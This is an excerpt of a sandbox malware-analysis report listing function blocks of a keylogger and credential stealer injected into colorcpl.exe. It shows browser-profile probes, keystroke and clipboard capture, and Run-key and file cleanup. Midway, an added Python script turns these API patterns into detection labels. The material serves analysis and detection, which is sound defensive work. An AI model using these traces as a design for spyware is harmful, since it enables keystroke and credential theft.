                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __fassign
                                                                                                                              • String ID: PkGNG
                                                                                                                              • API String ID: 3965848254-263838557
                                                                                                                              • Opcode ID: 0bfd670419a30e70b2122a04c0ff37dc7c92f96e788d8b5757dd12d671b03cbd
                                                                                                                              • Instruction ID: 02886470884d9f318e87f4c5a61e8c8c03e36e822b69b4f57d20c5ce9dfac2d9
                                                                                                                              • Opcode Fuzzy Hash: 0bfd670419a30e70b2122a04c0ff37dc7c92f96e788d8b5757dd12d671b03cbd
                                                                                                                              • Instruction Fuzzy Hash: 7251B1B0D0025AAFDB51CFA8DC45AEEBBF8EF19700F24416EE955E7291D6309940CB64
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Strings
Memory Dump Source
• Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
Yara matches
Similarity
• API ID: _memcmp_wcslen
• String ID: ?
• API String ID: 1846113162-1684325040
• Opcode ID: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
• Instruction ID: 0958e652da7918a42f50c3c8a33894c19f4db3fe08cf0fedac78bc2ffbb97701
• Instruction Fuzzy Hash: DE41917191834AAFE760DF64DC4999B77ECAB84751F00092AF685C2161EB74C948C7D2
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 04664066
  • Part of subcall function 0467B978: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,046C6468,0466D20D,.vbs,?,?,?,?,?,046D52F0), ref: 0467B99F
  • Part of subcall function 04678568: CloseHandle.KERNEL32(046640F5,?,?,046640F5,046C5E74), ref: 0467857E
  • Part of subcall function 04678568: CloseHandle.KERNEL32(046C5E74,?,?,046640F5,046C5E74), ref: 04678587
  • Part of subcall function 0467C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0466A843), ref: 0467C49E
• Sleep.KERNEL32(000000FA,046C5E74), ref: 04664138
Strings
• /sort "Visit Time" /stext ", xrefs: 046640B2
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
• String ID: /sort "Visit Time" /stext "
• API String ID: 368326130-1573945896
• Opcode ID: e5e26634435c7ad41e665f0c3fa6d2e648bc19bb5fa83a416193c63cb9bcdd39
• Instruction ID: ded52e456d05725473134f6f4dec36267a7afefa23b574415dd8cb3dcbb7fbb1
• Instruction Fuzzy Hash: 79313E31A101189BEB18FAB4DCA59FEB7B9AF91309F40006DE507A7194FF307D49CA98
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 04694770: __onexit.LIBCMT ref: 04694776
• __Init_thread_footer.LIBCMT ref: 0466B797
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: Init_thread_footer__onexit
• String ID: [End of clipboard]$[Text copied to clipboard]
• API String ID: 1881088180-3686566968
• Opcode ID: 7ffed1e4cfa7ce96632433d3d5c31b2eed2e7ee571021fe256d69a94951c0786
• Instruction ID: 1c6ed7e39ac66297805736fcf6815d4a3ec60865ba3dcf0e5c9707282dbf670e
• Instruction Fuzzy Hash: E2219C31A101198BEB14FBB4E8919EDB7B9AF51619F10012ED50BA7180FF30BD4ACA98
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,046B1D92,?,00000050,?,?,?,?,?), ref: 046B1C12
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID:
• String ID: ACP$OCP
• API String ID: 0-711371036
• Opcode ID: 3ea030991125bb485be30f42cd9004af38828f6a6b9265e644e43ee1f1f93c9d
• Instruction ID: 3c278618c82ec3fe1f9d6e4c183e26dc853ed9db66b79ce8c923c6781b966182
• Instruction Fuzzy Hash: F921F762B00101B6E7248E54C960BE7726AEB62BE5F5A4564D98AD7300F732FAC1C3D0
Uniqueness
Uniqueness Score: -1.00%

APIs
• _wcslen.LIBCMT ref: 066F7001
  • Part of subcall function 066EAAF0: _wcslen.LIBCMT ref: 066EAB09
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
Yara matches
Similarity
• API ID: _wcslen
• String ID: !D@$PG
• API String ID: 176396367-1987221222
• Opcode ID: 3229767f42b224c22e38ab05f87ced9dbd25ea478007aec8b0515c8cef1bdfe3
• Instruction ID: 2cec438619d899aa0984e8b75871c854e79231c51739a73c622aa902ad87a09d
• Instruction Fuzzy Hash: 7111A231B556001BDBD87B74AC71ABD3A8F9BA0700F44842EAD668F2D0DEA98A84525D
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
Yara matches
Similarity
• API ID: H_prolog
• String ID: NG$}E
• API String ID: 3519838083-2251168990
• Opcode ID: 531294bc55fe6296708d9916624f17236c631622ca51f748c31d8835be279a7a
• Instruction ID: d163af0a5b2070597fe7923cb73b45bc9a0a4a0bd73ce4c45788f37ae2a9deb2
• Instruction Fuzzy Hash: C1213731E011189BCB98F7A4DD529FEBB7AEF54610F10812EE12563290DF349F4AC758
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetLocalTime.KERNEL32(00000000), ref: 0467B509
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: LocalTime
• String ID: | $%02i:%02i:%02i:%03i
• API String ID: 481472006-2430845779
• Opcode ID: 3d566d7c4f3385b24c198df13b1cf86b601e1d83ddfd85be2c45a82a98b63450
• Instruction ID: b8b9a3c9d0501946a28025597dcdf852fce33c5ed2ce5c8b6da47979b1c2e9d5
• Instruction Fuzzy Hash: F7116D729182045BE704FB66D8548FFB3E8AB49608F50091EF497921D0FF38FA49D76A
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
Yara matches
Similarity
• API ID: _wcslen
• String ID: $$cF
• API String ID: 176396367-3386849937
• Opcode ID: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
• Instruction ID: 3bbb013077a940df164aaee98bb11a36c434f0957023bd8fd9350d932e61f94f
• Instruction Fuzzy Hash: EC115672941218BFD790E794DC45FDEBBB89F54710F15009BE914B3340E7789A44C6BA
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0466B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0466B172
  • Part of subcall function 0466B164: wsprintfW.USER32 ref: 0466B1F3
  • Part of subcall function 0467B4EF: GetLocalTime.KERNEL32(00000000), ref: 0467B509
• CloseHandle.KERNEL32(?), ref: 0466B0B4
• UnhookWindowsHookEx.USER32 ref: 0466B0C7
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
• String ID: Online Keylogger Stopped
• API String ID: 1623830855-1496645233
• Opcode ID: f980ac997f589e90b930f7579f7ec506e9d3c33f82150cd91dda30316cc64dab
• Instruction ID: 5cc414a76efddf3a5c9282e667f9682d2555aa72f6d06d2db91fdca933cefc7e
• Instruction Fuzzy Hash: C4017B30A04214ABEB31BB38D81A3BEBFB49F42604F40005CD547026C5FB613859DBDA
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
Yara matches
Similarity
• API ID: _free
• String ID: $G
• API String ID: 269201875-4251033865
• Opcode ID: 061f1d377262398e84625751e00800f7b3b9231d747b7f71bcbf8f837b64f860
• Instruction ID: d10e12438c2daecfd4c5e74bddbdaa91b65418eaf1275828b152dfc8f13d1a54
• Instruction Fuzzy Hash: 1EE06512E0193355A7F56A7AFE0C76A05C99BC1275F118326E734961C8DF74444181A6
Uniqueness
Uniqueness Score: -1.00%

APIs
• PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0466C4F6
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: ExistsFilePath
• String ID: UserProfile$\AppData\Local\Google\Chrome\
• API String ID: 1174141254-4188645398
• Opcode ID: e699c24b0d09aef1b859c15b1f3c2153314f03406e97477ee814e50545344655
• Instruction ID: 6ce6efb52c4ac810ebf7dbb1053fc8f3ee7a837fec31cc361b8e77ef7330634c
• Instruction Fuzzy Hash: 44F08271A0431997DB04B7B8DC1A8FE7B6CDE10605B40001DA90392181FF60BD46CAE9
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0466C559
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ExistsFilePath
                                                                                                                              • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                                                              • API String ID: 1174141254-2800177040
                                                                                                                              • Opcode ID: 10bdbb108ec9c4e62ba96837fa41f3396ceadd6304a878dc9c5645c97da5ed24
                                                                                                                              • Instruction ID: b81fc1ea2e7b216e30604e18f350e056937da6208bb76f206e12208da204f787
                                                                                                                              • Opcode Fuzzy Hash: 10bdbb108ec9c4e62ba96837fa41f3396ceadd6304a878dc9c5645c97da5ed24
                                                                                                                              • Instruction Fuzzy Hash: 7DF08271A0431997DB14B7B4DC168FE7B6CDE11615B00001EA90392180FF60BD46CAF9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0466C5BC
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ExistsFilePath
                                                                                                                              • String ID: AppData$\Opera Software\Opera Stable\
                                                                                                                              • API String ID: 1174141254-1629609700
                                                                                                                              • Opcode ID: 6bc8692913245638a8d9feabc8ec6b6ce6afe57ad7e460f8978b675dac24acba
                                                                                                                              • Instruction ID: 10989f258d22f52a3144699bb2095f0c940e02a2e6cb181cd18f54b38d06ca46
                                                                                                                              • Opcode Fuzzy Hash: 6bc8692913245638a8d9feabc8ec6b6ce6afe57ad7e460f8978b675dac24acba
                                                                                                                              • Instruction Fuzzy Hash: D0F05871A4431997DA04B7A4DC5A8FEBBACDE10605B40002EA903A2180FE60B9468AE9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free
                                                                                                                              • String ID: $G
                                                                                                                              • API String ID: 269201875-4251033865
                                                                                                                              • Opcode ID: 0ad43b1214ad8572508d9786c92e0b088e9d3dbafa2474dd36ac496255489d68
                                                                                                                              • Instruction ID: 178c1458b6aebbcc08e771afe0ab7ffa4f012e5638de6954fa1185f6a71140ab
                                                                                                                              • Opcode Fuzzy Hash: 0ad43b1214ad8572508d9786c92e0b088e9d3dbafa2474dd36ac496255489d68
                                                                                                                              • Instruction Fuzzy Hash: 36E0ED26A0543209A6FA663EFE4C6AA0AC98B81231F118327E678871C8DFA4448180A6
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • GetKeyState.USER32(00000011), ref: 0466B64B
                                                                                                                                • Part of subcall function 0466A3E0: GetForegroundWindow.USER32 ref: 0466A416
                                                                                                                                • Part of subcall function 0466A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0466A422
                                                                                                                                • Part of subcall function 0466A3E0: GetKeyboardLayout.USER32(00000000), ref: 0466A429
                                                                                                                                • Part of subcall function 0466A3E0: GetKeyState.USER32(00000010), ref: 0466A433
                                                                                                                                • Part of subcall function 0466A3E0: GetKeyboardState.USER32(?), ref: 0466A43E
                                                                                                                                • Part of subcall function 0466A3E0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0466A461
                                                                                                                                • Part of subcall function 0466A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0466A4C1
                                                                                                                                • Part of subcall function 0466A636: SetEvent.KERNEL32(?,?,00000000,0466B20A,00000000), ref: 0466A662
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                                              • String ID: [AltL]$[AltR]
                                                                                                                              • API String ID: 2738857842-2658077756
                                                                                                                              • Opcode ID: 195cbe983fcfd81b84c6093284e015572000b0c42aad28a5c866f8771dfec7d1
                                                                                                                              • Instruction ID: b7c14fa5b414aa44f76cd5c9834316910950ca502bd94e695e4f3df2621808f3
                                                                                                                              • Opcode Fuzzy Hash: 195cbe983fcfd81b84c6093284e015572000b0c42aad28a5c866f8771dfec7d1
                                                                                                                              • Instruction Fuzzy Hash: 56E0D831B00231939968377DE92E6BD3E51CB43E54B81014DE483EB784FD8A7D5543DA
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • GetKeyState.USER32(00000012), ref: 0466B6A5
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: State
                                                                                                                              • String ID: [CtrlL]$[CtrlR]
                                                                                                                              • API String ID: 1649606143-2446555240
                                                                                                                              • Opcode ID: 078a94830063922f4ef9d168be20f47e1ccd08ab1c27c3a01e64b804e133af9d
                                                                                                                              • Instruction ID: c4ddd603f0ed1dc2f63b63f1899ef46d4ecc7660b5e5e790d773b8660c6ce3d7
                                                                                                                              • Opcode Fuzzy Hash: 078a94830063922f4ef9d168be20f47e1ccd08ab1c27c3a01e64b804e133af9d
                                                                                                                              • Instruction Fuzzy Hash: 54E0CD31F0423193CB34363D9A1E67C2E10CB52E54F41015DF443C7685FD86791147CA
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0466D144,00000000,046D52D8,046D52F0,?,pth_unenc), ref: 04673A31
                                                                                                                              • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 04673A45
                                                                                                                              Strings
                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 04673A2F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: DeleteOpenValue
                                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                                              • API String ID: 2654517830-1051519024
                                                                                                                              • Opcode ID: 2d3baf9023afbe6ddbf3f2677251954d6e5689def8b62edb5d721b85ab8967fb
                                                                                                                              • Instruction ID: 67165447c81411a8111b717771e98268deb2841c81f4d3920b770d008c2ea679
                                                                                                                              • Opcode Fuzzy Hash: 2d3baf9023afbe6ddbf3f2677251954d6e5689def8b62edb5d721b85ab8967fb
                                                                                                                              • Instruction Fuzzy Hash: 2AE0127165420CBBDF104E71DD07FBA776CDB01B41F105298BB0692181E6669E99E6A0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0671547C: __onexit.LIBCMT ref: 06715482
                                                                                                                              • __Init_thread_footer.LIBCMT ref: 066F1C35
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Init_thread_footer__onexit
                                                                                                                              • String ID: ,kG$0kG
                                                                                                                              • API String ID: 1881088180-2015055088
                                                                                                                              • Opcode ID: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
                                                                                                                              • Instruction ID: 7f34462661c414b5c3b4ce9cb23299f9d082ddfcc5d6fde0ef72df5bb4aeecc3
                                                                                                                              • Opcode Fuzzy Hash: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
                                                                                                                              • Instruction Fuzzy Hash: 64E0DF35524920CFD3D8B37CDE8499877D1DB4B320B61802BEB24EA3C0CB2964428EAD
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0466B876
                                                                                                                              • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0466B8A1
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: DeleteDirectoryFileRemove
                                                                                                                              • String ID: pth_unenc
                                                                                                                              • API String ID: 3325800564-4028850238
                                                                                                                              • Opcode ID: c1b5714707efdd81a28c1e086fa251489c3c95782056ac14315f033c71baaab8
                                                                                                                              • Instruction ID: 4fcd24385f1a425fd87056d07b6ff7fbd45f901a2433ea63221ad9830c5a1e58
                                                                                                                              • Opcode Fuzzy Hash: c1b5714707efdd81a28c1e086fa251489c3c95782056ac14315f033c71baaab8
                                                                                                                              • Instruction Fuzzy Hash: EFE08C715106108BEB14AB34C858AD6339CEF2121AF00440ED493D3240FF38FC4DCAA4
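Reading the function blocks above is an inference from API sets to capability: PathFileExistsW against the Chrome, Edge and Opera profile directories is a probe for browser credential stores; GetKeyboardState feeding ToUnicodeEx, under GetKeyState and GetForegroundWindow, is the keylogger's key-to-character translation; RegOpenKeyExW on HKLM (handle 80000002) Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run followed by RegDeleteValueW removes a policy Run entry; and DeleteFileW plus RemoveDirectoryW is on-disk cleanup. The Python below, added here as an example and not code from Joe Sandbox or from the sample, parses the "APIs" bullets in the format shown on this page and applies those rules so the inference can be run over a whole report. The rule names, the rule thresholds and the Firefox profile path are this example's own assumptions; the sample blocks are copied from the bullets above.

```python
import re
from dataclasses import dataclass
from typing import Optional

# One "APIs" bullet from a Joe Sandbox function block, e.g.
#   • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0466C4F6
#   • Part of subcall function 0466A3E0: GetForegroundWindow.USER32 ref: 0466A416
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<callee>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Predefined hive handles as they appear in RegOpenKeyExW's first argument.
HIVES = {0x80000001: "HKCU", 0x80000002: "HKLM"}

# Profile directories a credential stealer probes. Chrome, Edge and Opera come from
# the report above; the Firefox entry is an assumption added for this example.
BROWSER_PROFILE_DIRS = (
    "\\Google\\Chrome\\",
    "\\Microsoft\\Edge\\",
    "\\Opera Software\\Opera Stable\\",
    "\\Mozilla\\Firefox\\",
)


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple
    ref: int
    callee: Optional[int]  # subcall function address when the call happened inside one


def parse_block(text: str) -> list:
    """Extract the API calls from one function block; Strings, Memory Dump Source,
    hashes and the other non-API bullets do not match API_LINE and are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        callee = int(m["callee"], 16) if m["callee"] else None
        calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16), callee))
    return calls


def hive_name(arg: str) -> str:
    """Map a hex hive handle to its name; placeholders such as '?' pass through unchanged."""
    try:
        return HIVES.get(int(arg, 16), arg)
    except ValueError:
        return arg


def classify(calls: list) -> set:
    """Heuristic capability labels (names are this example's own) for one function's calls."""
    found = set()
    apis = {c.api for c in calls}
    for c in calls:
        if c.api == "PathFileExistsW" and any(d in a for a in c.args for d in BROWSER_PROFILE_DIRS):
            found.add("browser-profile-probe")
        if c.api in ("RegOpenKeyExW", "RegCreateKeyExW") and c.args:
            if any("Policies\\Explorer\\Run" in a for a in c.args):
                found.add("policy-run-key-access:" + hive_name(c.args[0]))
    # ToUnicodeEx turns a virtual key into text using the state array GetKeyboardState filled;
    # with GetKeyState/GetForegroundWindow alongside, that is a keylogger's translation path.
    if {"GetKeyboardState", "ToUnicodeEx"} <= apis and apis & {"GetKeyState", "GetForegroundWindow"}:
        found.add("keystroke-capture")
    if "RegDeleteValueW" in apis and any(f.startswith("policy-run-key-access") for f in found):
        found.add("run-key-cleanup")
    if {"DeleteFileW", "RemoveDirectoryW"} <= apis:
        found.add("file-and-directory-removal")
    return found


# Sample input: the "APIs" bullets of four function blocks copied from the report above,
# one of them with its non-API neighbours left in to show they are ignored.
SAMPLE_BLOCKS = {
    "chrome-probe": r"""
• PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0466C4F6
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
""",
    "key-translation": r"""
• GetKeyState.USER32(00000011), ref: 0466B64B
  • Part of subcall function 0466A3E0: GetForegroundWindow.USER32 ref: 0466A416
  • Part of subcall function 0466A3E0: GetKeyboardState.USER32(?), ref: 0466A43E
  • Part of subcall function 0466A3E0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0466A461
""",
    "run-key-removal": r"""
• RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0466D144,00000000,046D52D8,046D52F0,?,pth_unenc), ref: 04673A31
• RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 04673A45
""",
    "self-removal": r"""
• DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0466B876
• RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0466B8A1
""",
}


def summarize(blocks: dict) -> dict:
    """Capability labels per block, sorted so the result is stable."""
    return {name: sorted(classify(parse_block(text))) for name, text in blocks.items()}


if __name__ == "__main__":
    for name, labels in summarize(SAMPLE_BLOCKS).items():
        print(f"{name:16s} {', '.join(labels) or '-'}")
```

The labels rank functions for review rather than convict them: any program that renders typed text legitimately pairs GetKeyboardState with ToUnicodeEx, and a browser itself checks its own profile directory, so the signal here is the combination of these sets in one injected image (the 04660000 region inside colorcpl) together with the report's other findings, not any single rule.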
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • TerminateProcess.KERNEL32(00000000,pth_unenc,0466F8C8), ref: 04672860
                                                                                                                              • WaitForSingleObject.KERNEL32(000000FF), ref: 04672873
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ObjectProcessSingleTerminateWait
                                                                                                                              • String ID: pth_unenc
                                                                                                                              • API String ID: 1872346434-4028850238
                                                                                                                              • Opcode ID: 8bd785a2ba4efeccb130c9f23445c2ab1b5be4e3c78cf5b96f841f0c117e6a10
                                                                                                                              • Instruction ID: 3b29d1940f134944c2e091105b46fd6cb31a7a17555e38d8996092f118339911
                                                                                                                              • Opcode Fuzzy Hash: 8bd785a2ba4efeccb130c9f23445c2ab1b5be4e3c78cf5b96f841f0c117e6a10
                                                                                                                              • Instruction Fuzzy Hash: CFD0127499A216AFDB350B60ED98B043B98EB06326F142286F522512F0E77D4C58EAA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,04661D55), ref: 046A0D27
• GetLastError.KERNEL32 ref: 046A0D35
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 046A0D90
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorLast
• String ID:
• API String ID: 1717984340-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,04671EF0), ref: 04671B8C
• IsBadReadPtr.KERNEL32(?,00000014,04671EF0), ref: 04671C58
• SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 04671C7A
